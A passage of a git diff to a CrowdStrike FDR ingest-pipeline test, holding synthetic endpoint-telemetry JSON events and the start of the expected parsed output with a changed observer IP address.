Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} +{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} +{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} +{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} +{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} +{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} +{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} +{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} +{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} +{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} +{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} +{"BootArgs":" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} +{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} +{"AgentLoadFlags":"0","AgentLocalTime":"1636436839.9529998","AgentTimeOffset":"125.319","AgentVersion":"6.31.14404.0","BiosManufacturer":"Apple Inc.","BiosVersion":"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)","ChassisType":"Laptop","City":"San Francisco","ComputerName":"mac1","ConfigBuild":"1007.4.0014404.1","ConfigIDBuild":"14404","Continent":"North America","Country":"United States","FalconGroupingTags":"-","FirstSeen":"1625682391.0","HostHiddenStatus":"Visible","MachineDomain":"none","OU":"none","PointerSize":"none","ProductType":"1","SensorGroupingTags":"-","ServicePackMajor":"none","SiteName":"none","SystemManufacturer":"Apple Inc.","SystemProductName":"MacBookPro16,2","Time":"1636448427.3539999","Timezone":"America/Los_Angeles","Version":"Big Sur (11.0)","aid":"fffffffffffaaaaaaaaabbbbbbbb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022ff","event_platform":"Mac"} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index ef3e5b50a36..bd9effe6e83 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json @@ -27,21 +27,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.210.242.193", - "vendor": "crowdstrike", - "ip": "208.210.242.193", "serial_number": "ffffffffa63e404bba4bff7465ab3afb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:21.137Z", "ecs": { @@ -49,18 +40,18 @@ }, "related": { "hosts": [ - "208.210.242.193" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.210.242.193" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465427800Z", - "original": 